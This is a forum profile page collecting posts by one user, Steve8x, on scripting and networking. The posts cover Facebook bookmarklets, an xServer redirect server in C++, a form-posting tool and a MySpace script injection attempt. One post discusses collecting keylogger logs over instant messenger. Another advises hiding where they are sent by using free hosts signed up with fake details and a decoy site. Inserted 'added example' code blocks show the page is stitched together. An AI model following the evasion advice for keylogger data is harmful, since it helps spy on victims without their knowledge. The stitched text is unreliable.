Everything posted by Steve8x

  1. Yeah Javascript is pimp! I always liked it since the beginning! EDIT: Updated scripts... Added some new ones / shorter code ones.

     Besides writing your Javascript on your own web pages, I like to write little javascripts to be injected over other pages too! Check out these I wrote and you'll see what I mean... The following scripts can be used on Facebook's site to achieve what each one does... They are prefixed with 'javascript:' because they are meant to be used from your browser's URL field; 'javascript:' tells it to execute the following as javascript rather than trying to interpret it as a URL or a search.

     NOTE * Latest versions of Firefox for a while now have blocked the use of javascript via the 'javascript:' prefix from being used whatsoever! So either use Firebug and execute the javascript from its console, which will work, or an alternative browser.

     NOTE * Chrome now removes the 'javascript:' if it's on your clipboard with whatever you paste into the URL field (your javascript), so you have to manually type the 'javascript:' at the beginning of Chrome's URL field after you've pasted the script, even if 'javascript:' was part of what you copied.

     FB Login:

     ```javascript
     javascript:
     login = document.forms['login_form'];
     login.email.value = "youremail@whatever.com";
     login.pass.value = "yourpassword";
     login.submit();
     ```

     This works from the homepage when not logged in; it takes the login form, fills out the two necessary fields and submits it. "login = document.forms[0];" could be used instead in this case, but I figured it is better to use the form's name as it's less likely to change, though they probably won't make a form besides the login form on the homepage that comes before it.

     FB Login v2: (including enabling/disabling the 'stay logged in' checkbox aka persist_box)

     ```javascript
     javascript:
     login = document.forms['login_form'];
     for(var i in login.elements)
     {
         if(login.elements[i].id == "persist_box")
         {
             stayLoggedInCheckbox = login.elements[i];
         }
     }
     login.email.value = "";
     login.pass.value = "";
     stayLoggedInCheckbox.checked = 0;
     login.submit();
     ```

     Changing that one line into this 'stayLoggedInCheckbox.checked = 1;' will check the stay logged in checkbox instead of unchecking it.

     Then I realised I could shorten it even further like this: (because I like to write my scripts as short as possible [least lines])

     FB Login v3:

     ```javascript
     javascript:
     login = document.forms['login_form'];
     stayLoggedInCheckbox = document.getElementById('persist_box');
     login.email.value = "";
     login.pass.value = "";
     stayLoggedInCheckbox.checked = 1;
     login.submit();
     ```

     FB Logout:

     ```javascript
     javascript:
     document.forms.logout_form.submit();
     ```

     Logs out if logged in... could also be written like: ( :D )

     ```javascript
     javascript:
     document.forms['logout_form'].submit();
     ```

     Fill out all open chat tabs' text areas: (It was supposed to be send msg to everyone whose chat tabs are open, but I couldn't figure out how to actually send the message to anyone from any tab let alone everyone... It's a bit different from submitting a form I think for this one, someone better at javascript analyzing/debugging complete this script and get it working! xD)

     ```javascript
     javascript:
     ChatTabs = document.getElementById('fbDockChatTabs');
     AllTabs = ChatTabs.getElementsByTagName('*');
     for (i in AllTabs)
     {
         var Tab = AllTabs[i];
         if(Tab.type == "textarea")
         {
             Tab.value = "Hello EVERYONE! LOLOLOLOL xD";
         }
     }
     void(0);
     ```

     And my personal favorite one, and which was a little trickier than the others. Took me a few revisions until I got it working!

     Post status update / Post on someone's wall: (whether you're somewhere where you'll post a status update for yourself, or on someone else's page where it will post there instead)

     [Post Status Update v0.5]

     ```javascript
     javascript:
     PageTextAreas = document.getElementsByTagName('textarea');
     PageForms = document.getElementsByTagName('form');
     StatusUpdateText = PageTextAreas[0];
     StatusUpdateForm = PageForms[0];
     for (i = 0; i < PageTextAreas.length; i++)
     {
         var TextInput = PageTextAreas[i];
         if(TextInput.className.indexOf("uiTextareaAutogrow input mentionsTextarea textInput") != -1)
         {
             if(TextInput.className.indexOf("DOMControl_placeholder") != -1)
             {
                 StatusUpdateText = TextInput;
                 break;
             }
         }
     }
     for (i = 0; i < PageForms.length; i++)
     {
         if(PageForms[i].action.indexOf("/ajax/updatestatus.php") != -1)
         {
             StatusUpdateForm = PageForms[i];
             StatusUpdateText.value = "Yo, whats good everyone?! xD";
             StatusUpdateForm.submit();
         }
     }
     void(0);
     ```

     I found that the text area of the page containing the keywords 'uiTextareaAutogrow input mentionsTextarea textInput' and 'DOMControl_placeholder' was the right place to put the text for status updates / wall posts, and also that the action of the form responsible for them was containing '/ajax/updatestatus.php'! With both of those you can then modify the text and submit a status update!! I suppose an improvement could include a delay after filling out the text to, for example, allow for links that load content to be properly posted.

     Alright, there were some fun javascripts I was working on! Off to go and write some more!
  2. I know what thats from foo ;) But anyway whats up with most people not having any icons whatsoever? lol my desktop looks almost as cluttered as darren's right now. You know I start off with my basic icons, web browsers, irc client, a few games, programming IDE's, putty, OllyDbg+IDAPro, and some other good to have apps. Then slowly things start to get cluttered as I work on projects and add more icons to the screen. Then when it gets real bad I take some time to clean it. Which usually amounts to putting the junk somewhere else lol. Just make a new folder called junk and cram it all in there. Problem solved. But If I'm not being lazy I'll actually go through it and delete what I don't want and keep what I do. Anyway this will probably be useful to me as I too hate it when the icons get screwed up. Doesn't happen all the time, but sometimes when a game crashes or something goes wrong; Thats when it screws up my icons! I'll give it a try :D
  3. Stick to Windows for now. Once you're a comfortable Win32 C++ programmer you may want to try and take on coding for Linux. The best C++ compiler ever: http://www.microsoft.com/express/vc/ Microsoft Visual C++ 2008 Express Edition. Microsoft knows their shit^^^ So you can thank them for providing this awesome C++ compiler absolutely free. Don't torrent the FULL Visual Studio 2008! It really isn't necessary, it's a huge download and doesn't include anything needed that you don't get with the Express Edition (it just has the extra stuff, VB, VC#, etc.. things a C++ programmer doesn't need). And when you're ready to release your application (if you're going to) then follow this thread to make it fully portable (as in it will run on any Windows machine): http://hak5.org/forums/index.php?showtopic=10279
  4. X3n I never thought of that! But its a good GREAT idea actually! Only issue is it would be a little awkward receiving your log files in an instant messenger! lol... Although for services like MSN, you don't have to be signed online to get your logs, once you sign on you'll get all your messages, I think its called offline messaging... You'd have to decide whether you'd want to send them in plaintext(to save time so when you look at it in your instant messenger you can just read the log and copy and paste it into a file to save it. Or you could send it encoded/encrypted, and have to do an extra step decoding/decrypting the copy and pasted data from the IM window... You could possibly even use the IM apps own save log file option, and have a custom app read through it and decode/decrypt the content, it would have to know how to read the file saved from that particular IM so it would be able to get the content only and not the: message from user: info saved with the file... Doing it wouldn't be to hard I don't think, You'll just have to do some packet sniffing with your IM of choice and figure out how it communicates with the server to login and send some instant messages! ;) Then code a client app which does only the basics, sign in, send IM! And as you said IM accounts are a dime a dozen you can easily make one just for this purpose and you really don't care if the user+password is discovered since it isnt for anything important... I'll look into it see if I can figure it out! I think I'll go with MSN/Windows Live Messenger
  5. Ahh, I see now! Thanks digip! ;) I was looking for the option under the user CP, instead of right in a thread itself! That's why I couldn't find it at first...
  6. Hi, recently I have been annoyed by posts in a thread not showing up on the page all at once, instead I see the first post of the thread, then below it are links to other posts. It didn't used to be like this, before it showed the posts! Not sure what caused the change, I did not change any settings. Is there a setting I'm not finding? I looked in the My Controls and can't seem to find a way switch it back to normal... here's an image that shows what I mean: Instead of showing that bottom part with links to make the posts show, I'd like the posts to just be there, and if theres more than 1 page I can click the next page! How do you change it back to normal?
  7. Well lets see how it all pans out! As we all know politicians promise more than they can really do(Since they want to win, Say whatever it takes, do whatever it takes to win, then relax lol). So apparently Mr. Barrack convinced more people that he's the better choice. So lets find out what he can actually do. ;) In time we will know...
  8. Yes, you can see where the log is being posted to, but you can't see the password to the MySQL database ;) If you're sending the logs to your own computer, your own IP, then you have a problem... So that's why you create a free web hosting account with one of the many free web hosts (with fake info of course). You don't use a paid-for host!!! Also you should create a website as a front! So the free web host won't shut your site down for not having any actual content. Because they do check them once in a while to make sure you're complying with their TOS. X3N, yes you can virtually do anything with the PHP code once you have received the data on it, I just demonstrated using MySQL databases, because that's something that lots of hosts offer plus it's fairly easy to insert data into! Sometimes on free hosts certain things are limited. But MySQL databases are plentiful ;)
  9. I haven't ever heard of this program, but to answer your question: how hard is it to make? For what you want, it's very simple. Since you don't even care about what the client (the web browser connecting to the server) is requesting, you don't have to interpret what you receive, since you'll always send the same response to redirect them to a different URL...

     You kind of have the wrong idea though.. "portscanned"? A server does not have to scan for anything, instead it "listens" for connections on the port it's bound to! Since web servers normally go on port 80, that's the port clients will connect to the server on. No port scanning required, you already know the port where connections will come through...

     I have made a simple web server app which does what you described... It's called "xServer". There are multiple ways of redirecting the client to a specified URL. I chose this method: send them some simple HTML that the browser will understand and reload the page to the new URL...

     ```html
     <html><meta http-equiv="refresh" content="0;url=http://www.RedirectToHere.com"></html>
     ```

     Putting that HTML on a web page will cause the page to "refresh" after 0 seconds, to RedirectToHere.com! ;)

     It works like this: you run it for the first time and it creates a default "config.ini" file, which contains the character "1" on the first line and the default site to redirect to, that being "http://www.google.com". The "1" means to write to the access log file! The access log file records the IP address, page requested, and HTTP version information from clients who connect to the server. Note that it doesn't matter what is requested, it isn't taken into consideration, it always just forwards them to the URL you specify in the edit box...
     An access log looks something like this:

     ```
     -- 11/04/08 20:43:25 -- GET / HTTP/1.1
     -- 11/04/08 20:43:57 -- GET / HTTP/1.1
     -- 11/04/08 21:24:38 -- GET / HTTP/1.0
     -- 11/04/08 21:26:31 -- GET / HTTP/1.1
     -- 11/04/08 21:36:03 -- GET / HTTP/1.1
     ```

     You can go to a proxy site like this as a test: proxypimp.com (only 1 I can ever remember lol) and type in your IP address (or domain name if you have one), and if you are port forwarded correctly (no firewalls blocking the port), you will see the redirection happen, and if you check your access.log it will show the IP address of the computer that connected along with the date and time, and what was requested, ex. "GET /" is the root folder, and HTTP/1.1 is the version :P

     You can turn the access log recording off by simply unchecking the box. Remember to hit "save config" if you want to save your changes to the config file so you don't have to type the URL in every time or uncheck/check the box every time. It remembers your settings for you... You can also minimize the app to the system tray by simply minimizing it! Closing the window with the [x] will terminate the program... Same with "Quit" on the tray menu when minimized...

     It's far from a full-blown web server like Apache, but it demonstrates how easy it can be for a simple web server...

     source code and binary: (exe is in Release folder) http://popeax.com/x/xServer.zip

     I have the server running now but not on port 80 like the released version is set up to run on. (Port 80 is the default HTTP port; when you type a URL in your browser like: http://www.google.com/ it connects to it on port 80... if you specify however: http://www.google.com:8080 it will instead try to connect on port 8080.)

     http://popeax.com:1337

     It should redirect you to a certain website... ;)

     [xServer.cpp]

     ```cpp
     //xServer v1.0 a simple HTTP Server
     //Which redirects all requests
     //to a specified URL!
     //Written By Steve8x

     #include "xServer.h"

     using namespace std;

     xServer x;
     EZwindows ez;

     NOTIFYICONDATA* n = new NOTIFYICONDATA;
     char* url = new char[1024];

     int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmd, int nCmdShow)
     {
         MSG Msg;
         WNDCLASSEX wc;

         ez.hInst = hInstance;

         HBRUSH ButtonFaceBrush = CreateSolidBrush(GetSysColor(COLOR_BTNFACE));

         wc.cbSize = sizeof(WNDCLASSEX);
         wc.hInstance = hInstance;
         wc.lpszClassName = L"xServer_Class";
         wc.lpfnWndProc = WndProc;
         wc.style = CS_DBLCLKS;
         wc.hIcon = LoadIcon(hInstance, MAKEINTRESOURCE(101));
         wc.hIconSm = LoadIcon(hInstance, MAKEINTRESOURCE(101));
         wc.hCursor = LoadCursor(0, IDC_ARROW);
         wc.lpszMenuName = NULL;
         wc.cbClsExtra = 0;
         wc.cbWndExtra = 0;
         wc.hbrBackground = ButtonFaceBrush;

         RegisterClassEx(&wc);

         // Initialize common controls library!
         ez.InitCommonCtrls();
         InitFonts();

         //Create the window
         hwnd = CreateWindowExA(0, "xServer_Class", "Server 1.0",
             WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX | WS_CLIPSIBLINGS,
             CW_USEDEFAULT, CW_USEDEFAULT, 245, 145, HWND_DESKTOP, 0, hInstance, 0);

         hText = ez.text(hwnd, "Redirect clients to this URL:", 1, 1, 250, 20, 200);
         hEdit = ez.edit(hwnd, 1, 0, 0, 1, 18, 235, 20, 300);
         hStatus = ez.text(hwnd, "Status: Server Is Down!", 1, 40, 260, 20, 201);
         hStart = ez.button(hwnd, "Start Server", 1, 60, 75, 20, 420);
         hStop = ez.button(hwnd, "Stop Server", 80, 60, 75, 20, 421);
         hSave = ez.button(hwnd, "Save Config", 159, 60, 75, 20, 422);
         hCheck = ez.check(hwnd, "Write to access log", 1, 84, 148, 20, 500);

         SendMessage(hText, WM_SETFONT, (WPARAM)txtFont, 1);
         SendMessage(hEdit, WM_SETFONT, (WPARAM)editFont, 1);
         SendMessage(hStart, WM_SETFONT, (WPARAM)txtFont, 1);
         SendMessage(hStop, WM_SETFONT, (WPARAM)txtFont, 1);
         SendMessage(hSave, WM_SETFONT, (WPARAM)txtFont, 1);

         ReadIni();

         EnableWindow(hStop, 0);

         //Show the window
         ShowWindow(hwnd, nCmdShow);
         UpdateWindow(hwnd);

         //Init winsock 2.2
         WSADATA wsaData = {0};
         WSAStartup(MAKEWORD(2, 2), &wsaData);

         while(GetMessage(&Msg, 0, 0, 0))
         {
             TranslateMessage(&Msg);
             DispatchMessage(&Msg);
         }

         return Msg.wParam;
     }

     LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
     {
         static UINT TaskbarRestart;

         switch (message)
         {
         case WM_CREATE:
             TaskbarRestart = RegisterWindowMessageA("TaskbarCreated");
             break;

         case MSG_XTRAYICON:
             if(wParam != 0x13379)
             {
                 break;
             }
             if(lParam == WM_LBUTTONUP)
             {
                 n->uID = 0x13379;
                 Shell_NotifyIcon(NIM_DELETE, n);
                 ShowWindow(hwnd, SW_RESTORE);
             }
             else if(lParam == WM_RBUTTONUP)
             {
                 HMENU menu = 0;
                 menu = CreatePopupMenu();
                 AppendMenuA(menu, MF_STRING, IDM_SHOWWND, "Show");
                 AppendMenuA(menu, MF_STRING, IDM_TRAYABOUT, "About");
                 AppendMenuA(menu, MF_STRING, IDM_TRAYEXIT, "Quit");

                 // POINT lives on the stack and the menu is destroyed after use,
                 // so nothing leaks on each right click
                 POINT p;
                 GetCursorPos(&p);
                 SetForegroundWindow(hwnd);
                 TrackPopupMenu(menu, 0, p.x, p.y, 0, hwnd, 0);
                 SendMessage(hwnd, WM_NULL, 0, 0);
                 DestroyMenu(menu);
             }
             break;

         case WM_COMMAND:
             if(wParam == IDM_SHOWWND)
             {
                 n->uID = 0x13379;
                 Shell_NotifyIcon(NIM_DELETE, n);
                 ShowWindow(hwnd, SW_RESTORE);
             }
             else if(wParam == IDM_TRAYABOUT)
             {
                 MessageBoxA(0, "xServer 1.0 © 2008\n\nCoded by Steve8x", "About", MB_OK);
             }
             else if(wParam == IDM_TRAYEXIT)
             {
                 Shell_NotifyIcon(NIM_DELETE, n);
                 Running = 0;
                 x.Close(client);
                 x.Close(x.servsock);
                 SetWindowTextA(hStatus, "Status: Server Is Down!");
                 EnableWindow(hStart, 1);
                 EnableWindow(hStop, 0);
                 ExitProcess(0);
             }

             if(wParam == 420)
             {
                 if(!Running)
                 {
                     Running = 1;
                     x.StartServer(80); //Server Should Run On Port 80!
                     CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&ListenThread, 0, 0, 0);
                     SetWindowTextA(hStatus, "Status: Server Up And Running!");
                     EnableWindow(hStart, 0);
                     EnableWindow(hStop, 1);
                 }
             }
             else if(wParam == 421)
             {
                 if(Running)
                 {
                     Running = 0;
                     x.Close(client);
                     x.Close(x.servsock);
                     SetWindowTextA(hStatus, "Status: Server Is Down!");
                     EnableWindow(hStart, 1);
                     EnableWindow(hStop, 0);
                 }
             }
             else if(wParam == 422)
             {
                 SaveIni();
             }
             else if(wParam == 500)
             {
                 LRESULT l = SendMessage(hCheck, BM_GETCHECK, 0, 0);
                 if(l == BST_CHECKED)
                 {
                     x.WriteToLog = 1;
                 }
                 else
                 {
                     x.WriteToLog = 0;
                 }
                 SaveIni();
             }
             else if(HIWORD(wParam) == EN_CHANGE)
             {
                 if(LOWORD(wParam) == 300)
                 {
                     ZeroMemory(url, 1024);
                     GetWindowTextA(hEdit, url, 1024);
                 }
             }
             break;

         case WM_LBUTTONDOWN:
             //I do this for all my app's I like dragging the window from anywhere
             SendMessage(hWnd, WM_NCLBUTTONDOWN, HTCAPTION, lParam);
             break;

         case WM_CTLCOLORSTATIC:
             SetBkMode((HDC)wParam, TRANSPARENT);
             // COLOR_BTNFACE is a system color index, not a stock object id
             return (LRESULT)GetSysColorBrush(COLOR_BTNFACE);

         case WM_SYSCOMMAND:
             if(wParam == 0xF020)// window was minimized so send app to tray!
             {
                 MinimizeToTray();
                 break;
             }
             return DefWindowProc(hWnd, message, wParam, lParam);

         case WM_CLOSE:
             delete[] url;
             DeleteObject(txtFont);
             DeleteObject(editFont);
             WSACleanup();
             PostQuitMessage(0);
             break;

         default:
             if(message == TaskbarRestart)
             {
                 MinimizeToTray();
             }
             return DefWindowProc (hWnd, message, wParam, lParam);
         }

         return 0;
     }

     void ListenThread()
     {
         for(;; Sleep(10))
         {
             client = x.Accept();

             if(Running == 0)
             {
                 ExitThread(0);
             }

             if(client != INVALID_SOCKET)
             {
                 OutputDebugStringA("Client Connected!");
                 CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&RedirectClient, 0, 0, 0);
             }
         }
     }

     void RedirectClient()
     {
         SOCKET tmpsock = client;
         char* tmp = new char[1024];
         char xdate[9];
         char xtime[9];
         int contentlen = 0;

         string recvdata = "";
         string senddata = "";
         string logstring = "";

         _strdate(xdate);
         _strtime(xtime);

         // url can be up to 1023 characters, so format with a bound
         // instead of sprintf to keep the result inside tmp
         _snprintf(tmp, 1023, RedirectCode, url);
         tmp[1023] = 0;
         contentlen = strlen(tmp);
         senddata.assign(tmp);

         _snprintf(tmp, 1023, HTTPheader, xdate, xtime, contentlen);
         tmp[1023] = 0;
         senddata.insert(0, tmp);

         recvdata = recvx(tmpsock);
         sendx(tmpsock, senddata);

         size_t strsize;
         strsize = recvdata.find("Host");
         // find() returns string::npos when the request has no "Host" header;
         // log the whole request then, so fwrite never reads past the buffer
         if(strsize == string::npos)
         {
             strsize = recvdata.size();
         }

         if(x.WriteToLog == TRUE)
         {
             f = fopen("access.log", "ab");
             if(f)
             {
                 fwrite(recvdata.c_str(), strsize, 1, f);
                 fclose(f);
             }
         }

         // close this thread's own socket; the global "client" may already
         // hold a newer connection accepted by ListenThread
         x.Close(tmpsock);
         delete[] tmp;
     }

     void InitFonts()
     {
         lFont.lfHeight = 14;
         lFont.lfWeight = 420;
         wcscpy(lFont.lfFaceName, L"MS Sans Serif");
         txtFont = CreateFontIndirect(&lFont);

         lFont.lfHeight = 16;
         lFont.lfWeight = 420;
         wcscpy(lFont.lfFaceName, L"Terminal");
         editFont = CreateFontIndirect(&lFont);
     }

     long getfilesize(FILE* file)
     {
         long temp;

         // use the parameter, not the global f
         fseek(file, 0, SEEK_END);
         temp = ftell(file);
         rewind(file);

         return temp;
     }

     void ReadIni()
     {
         ZeroMemory(url, 1024);

         f = fopen("config.ini", "rb");

         if(!f)
         {
             //if it doesn't exist yet save the default config
             f = fopen("config.ini", "wb");
             strcpy(url, "http://www.google.com");
             fwrite("1\r\n", 3, 1, f);
             fwrite(url, strlen(url), 1, f);
             fclose(f);
             x.WriteToLog = 1;
             SendMessage(hCheck, BM_SETCHECK, 1, 0);
         }
         else
         {
             long StrSize = getfilesize(f);

             fread(url, 3, 1, f);

             if(url[0] == '1')
             {
                 SendMessage(hCheck, BM_SETCHECK, 1, 0);
                 x.WriteToLog = 1;
             }

             // the URL is what follows the 3-byte flag line; never read
             // more than the 1024-byte buffer can hold with its terminator
             StrSize -= 3;
             if(StrSize < 0) StrSize = 0;
             if(StrSize > 1023) StrSize = 1023;
             ZeroMemory(url, 1024);
             fread(url, 1, StrSize, f);
             fclose(f);
         }

         SetWindowTextA(hEdit, url);
     }

     void SaveIni()
     {
         f = fopen("config.ini", "wb");

         if(x.WriteToLog == TRUE)
             fwrite("1\r\n", 3, 1, f);
         else
             fwrite("0\r\n", 3, 1, f);

         fwrite(url, strlen(url), 1, f);
         fclose(f);
     }

     void MinimizeToTray()
     {
         n->cbSize = sizeof(NOTIFYICONDATA);
         n->hWnd = hwnd;
         n->uFlags = NIF_ICON | NIF_MESSAGE | NIF_TIP;
         n->uCallbackMessage = MSG_XTRAYICON;
         n->hIcon = (HICON)LoadImage(GetModuleHandle(0), MAKEINTRESOURCE(101), IMAGE_ICON, 16, 16, 0);
         n->uID = 0x13379;
         wcscpy(n->szTip, L"xServer 1.0");

         Shell_NotifyIcon(NIM_ADD, n);

         ShowWindow(hwnd, SW_MINIMIZE);
         ShowWindow(hwnd, SW_HIDE);
     }
     ```
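An added example, not part of the original post or of the xServer source: a portable C++ version of the two string-handling steps in `RedirectClient` (building the meta-refresh page and taking the request line for `access.log`), written so the configured URL cannot break out of the HTML attribute and a client's request cannot inject extra log lines or be read past its end. The function names are hypothetical, and the response header layout is an assumption, since `RedirectCode` and `HTTPheader` are defined in xServer.h, which the post does not show.

```cpp
#include <cstddef>
#include <iostream>
#include <string>

// Escape the characters that could end or alter an HTML attribute value.
std::string html_attr_escape(const std::string& in)
{
    std::string out;
    out.reserve(in.size());
    for (std::size_t i = 0; i < in.size(); ++i) {
        switch (in[i]) {
            case '&':  out += "&amp;";  break;
            case '"':  out += "&quot;"; break;
            case '\'': out += "&#39;";  break;
            case '<':  out += "&lt;";   break;
            case '>':  out += "&gt;";   break;
            default:   out += in[i];
        }
    }
    return out;
}

// The meta-refresh page from the post, with the URL escaped before insertion.
std::string build_redirect_page(const std::string& url)
{
    return "<html><meta http-equiv=\"refresh\" content=\"0;url="
           + html_attr_escape(url) + "\"></html>";
}

// Assumed minimal header set; Content-Length comes from the real body size,
// and std::string grows as needed, so no fixed buffer can overflow.
std::string build_response(const std::string& url)
{
    const std::string body = build_redirect_page(url);
    return "HTTP/1.1 200 OK\r\n"
           "Content-Type: text/html\r\n"
           "Content-Length: " + std::to_string(body.size()) + "\r\n"
           "Connection: close\r\n\r\n" + body;
}

// Request line for the access log: first line only, capped in length,
// control characters replaced so one request is always one log line.
std::string log_line_from_request(const std::string& request,
                                  std::size_t max_len = 256)
{
    std::size_t end = request.find_first_of("\r\n");
    if (end == std::string::npos) end = request.size(); // no line break at all
    if (end > max_len) end = max_len;

    std::string line;
    line.reserve(end);
    for (std::size_t i = 0; i < end; ++i) {
        unsigned char c = static_cast<unsigned char>(request[i]);
        line += (c < 0x20 || c == 0x7f) ? '?' : request[i];
    }
    return line;
}

int main()
{
    // Constructed sample inputs, not captured traffic.
    std::cout << build_response("http://www.google.com") << "\n";
    std::cout << log_line_from_request("GET / HTTP/1.1\r\nHost: example.test\r\n\r\n") << "\n";
    std::cout << log_line_from_request("GET /no-host-header") << "\n";
    return 0;
}
```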
  10. Multi-threading is a technique that programmers use to make their applications faster! Imagine you have one function that executes code and does two things one after the other... That code is running in 1 thread... If you split it up into two threads, you can get the job done faster. You'll have two threads running simultaneously. However if the first thing has to be done before the second, then you won't be able to make it two threads, since you need the output from the first block of code before you can run the second... Make sense? A search on Google for "Threads" gives this as the second result... http://en.wikipedia.org/wiki/Multi-threading I don't code in VB though so I wouldn't be able to help you with the code.. C++ ftw... ;)
  11. yeah same, I haven't been there since some year in the 1990's probably about 10 years ago! lol That explains why its probably down... Back when I had Windows 95! ;) Anyway yeah thats what I'm looking for, something were you can telnet in... I'll checkout HackThisSite but it seems a little different than hackerslab... (no telnet)
  12. Hello, I recently remembered a website I found a long time ago that was pretty cool! It's called hackers lab and basically the idea was there are different levels, and you have to figure out how to get to the next level by using your hacking skills! Each level becomes harder and harder. Back when I discovered the website I wasn't that great with computers yet so I couldn't get past the second level. (Somehow I made it to the second level, the first must've been really easy.) Anyway, now I remembered it and wanted to try again and see if I could get farther! But the problem is it is down now... The website is still up but the telnet server is down :( http://www.hackerslab.org/eorg/ So basically, is there anything else like hackerlab.org that is up and running? It's a cool idea, and you won't get in any trouble, too bad it's down...
  13. Alright, I was messing around with it today and made the example app... It works similar to what I said previously, except instead of using double quotes " you use single quotes! So for example instead of :name="Steve" you do :name='Steve'. I did it that way because if you wanted to use double quotes you'd have to write a backslash \ before each " (to escape it) and I thought that would be annoying, so I just made it a single quote... ;)

     You can also use most special characters [because I encode the field data before sending it], except for single quote (obviously, since it will end the value early) and &. The & sign is used to separate field=value's from each other. This is an example of the content the app actually posts:

     ```
     name=Steve&comment=hello+my+name+is+steve%21
     ```

     So you can't put another & in there anywhere, otherwise something's going to get cut off as it thinks you're specifying a new field name and value.. The +'s are just spaces (you don't have to write plus though when doing spaces, it converts it for you). The %21 is what all special characters are changed into, it's the hex byte of the character. %21 or 0x21 is a !

     Here's some example usage: You can test it on http://popeax.com/x/ and see the result of your post... There is no actual HTML form, only a script to accept posted data... The two values that it looks for for input are "name" and "comment", so doing a:

     ```
     frmpost -h popeax.com -s /x/index.php :name='My Name' :comment='Hello World!'
     ```

     would submit a comment to that web page ;)

     source code + binary: (Release folder contains binary executable) http://popeax.com/x/frmpost.zip

     Batch scripting anyone? :) That should help you out with whatever you're trying to do...
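An added example, not frmpost's actual source: a C++ encoder and parser for the `field=value&field=value` body format the post describes (`+` for spaces, `%XX` hex bytes for special characters). It goes one step beyond the tool as described by percent-encoding `&` and `=` inside values too, which is what lets a value contain those separators without being cut off; all function names are hypothetical.

```cpp
#include <cstddef>
#include <string>
#include <utility>
#include <vector>

typedef std::vector<std::pair<std::string, std::string> > FieldList;

// Encode one name or value: letters, digits and - _ . * pass through,
// space becomes '+', every other byte becomes %XX.
std::string form_encode(const std::string& in)
{
    static const char hex[] = "0123456789ABCDEF";
    std::string out;
    for (std::size_t i = 0; i < in.size(); ++i) {
        unsigned char c = static_cast<unsigned char>(in[i]);
        bool plain = (c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z') ||
                     (c >= '0' && c <= '9') ||
                     c == '-' || c == '_' || c == '.' || c == '*';
        if (plain)         out += static_cast<char>(c);
        else if (c == ' ') out += '+';
        else { out += '%'; out += hex[c >> 4]; out += hex[c & 0x0F]; }
    }
    return out;
}

static int hex_val(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = static_cast<char>(c | 0x20);              // fold A-F to a-f
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

// Reverse of form_encode; a malformed % sequence is kept literally.
std::string form_decode(const std::string& in)
{
    std::string out;
    for (std::size_t i = 0; i < in.size(); ++i) {
        if (in[i] == '+') {
            out += ' ';
        } else if (in[i] == '%' && i + 2 < in.size() + 0 &&
                   hex_val(in[i + 1]) >= 0 && hex_val(in[i + 2]) >= 0) {
            out += static_cast<char>(hex_val(in[i + 1]) * 16 + hex_val(in[i + 2]));
            i += 2;
        } else {
            out += in[i];
        }
    }
    return out;
}

// Join encoded pairs with '&', as in the posted body shown in the post.
std::string build_form_body(const FieldList& fields)
{
    std::string body;
    for (std::size_t i = 0; i < fields.size(); ++i) {
        if (i) body += '&';
        body += form_encode(fields[i].first) + "=" + form_encode(fields[i].second);
    }
    return body;
}

// What the receiving script sees: split on '&', then on the first '='.
FieldList parse_form_body(const std::string& body)
{
    FieldList fields;
    std::size_t start = 0;
    while (start <= body.size()) {
        std::size_t amp = body.find('&', start);
        if (amp == std::string::npos) amp = body.size();
        std::string item = body.substr(start, amp - start);
        if (!item.empty()) {
            std::size_t eq = item.find('=');
            std::string value;
            if (eq != std::string::npos) value = item.substr(eq + 1);
            fields.push_back(std::make_pair(form_decode(item.substr(0, eq)),
                                            form_decode(value)));
        }
        start = amp + 1;
    }
    return fields;
}
```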
  14. Well, I think the best way to do it would be a standalone app. Not an addon to IE... Have it read a list of URLs from a text file... It will download and read each page individually... For example when it finds a form:

     ```html
     <form action="/path/to/script.php" method="post">
     <input name="fname" type="text" size="24" maxlength="15">
     <input name="pass" type="text" size="24" maxlength="15">
     <input name="postform" type="submit" value="Submit!">
     </form>
     ```

     Get the input names and then post your data to them... It will be kind of difficult to make it dynamic (whereas it will work for any page). You'd have to read the different input types and know the names of the fields, and know what to put in them... How will you know what to put in the fields is the biggest problem? Because not all fields are named the same on different sites, and they all need different values. For example, how will you know you're not putting a name in a zipcode field? You called it "auto-fill", it should be called "auto-post"... What have you normally done? What do you "fill" in the boxes? Just random stuff or what?

     Another benefit of downloading the HTML with winsock and then posting to the page is that you bypass any javascript/client-sided form-field validation... (however where you're submitting the form to most likely has checks there which can't be bypassed since they are server sided!) I would suggest looking up the HTTP protocol, particularly HTTP POST... This can also help you out too: http://hak5.org/forums/index.php?showtopic=10535 It's a recent thing I made which does what you want, it auto-posts form data to a server-sided script...

     EDIT: I just came up with an idea actually, but what are you going to be inputting into the fields? Random numbers and letters or what? An app similar to that except it lets you specify the field names and values, something like this: let's say the app is called "formsubmit"

     ```
     formsubmit -h www.peoriabloomingtoncarloans.com -s /scripts/App.dll :fname="Bob" :lname="0x539" :WPhone="123-456-7890" :Addr="123 Burning Tree Lane" :city="Somecity" :State="somestate" :zip="zipcode" :comments="I'm interested in getting pre-approved for a vehicle" etc...
     ```

     * I only did the required fields on that form ;)

     where -h is the host, -s is the path to the script, which is probably not a real Win32 "DLL" file, it's probably some sort of scripting language like PHP disguised, maybe CGI, or ASP... Then the fields are identified by some kind of marker, here I chose : marks the start of a field name, and = marks the end of it, then between the quotes is what to put in that field... Make sense?

     It would take quite some time manually writing things to put into the fields, so I don't really get it... So are you wanting random values in the fields? Or ones that make sense? Anyway what would this do for you? I don't see what you're getting out of it, spamming junk to auto-loan forms? It doesn't seem like there's any benefit...
  15. Steve8x


    Strangely I can't seem to get the desired effect on my myspace page... I also tried:

    alert.js:

    ```javascript
    function HackedUpSpace()
    {
        alert("Welcome to my myspace page!");
    }
    ```

    alert.html:

    ```html
    <html>
    <script type="text/javascript" src="http://popeax.com/alert.js"></script>
    <body onload="HackedUpSpace();" />
    </html>
    ```

    Still to no avail! Can someone else test it and confirm it's working? Maybe I'm just doing something wrong?
  16. Steve8x


    That's awesome! I didn't know you could do that!! ;) lol it's been like this for a while now, so they haven't exactly figured it out yet! I wonder how long it will take them to patch it... Well looks like some javascript fun until they do! :) Nice job
  17. Steve8x

    USBhacksaw Help

